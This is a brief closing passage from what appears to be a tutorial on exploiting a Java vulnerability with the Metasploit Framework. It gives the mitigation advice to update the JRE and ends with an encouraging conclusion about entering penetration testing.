Update your JRE to the latest version.


conclusion:
I hope this article has given you a good insight into how to use MetaSploit Framework to exploit the Java vulnerability.  I hope this will help you to get into the PenTesting world..!